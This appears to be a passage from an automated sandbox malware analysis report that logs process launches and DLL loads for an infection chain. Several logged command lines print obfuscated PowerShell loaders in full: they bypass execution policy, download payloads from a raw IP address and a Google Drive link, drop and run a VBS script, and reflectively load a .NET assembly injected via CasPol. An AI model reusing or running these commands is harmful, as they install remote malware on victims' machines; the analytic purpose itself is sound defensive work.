yd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2BF1.tmp" "c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
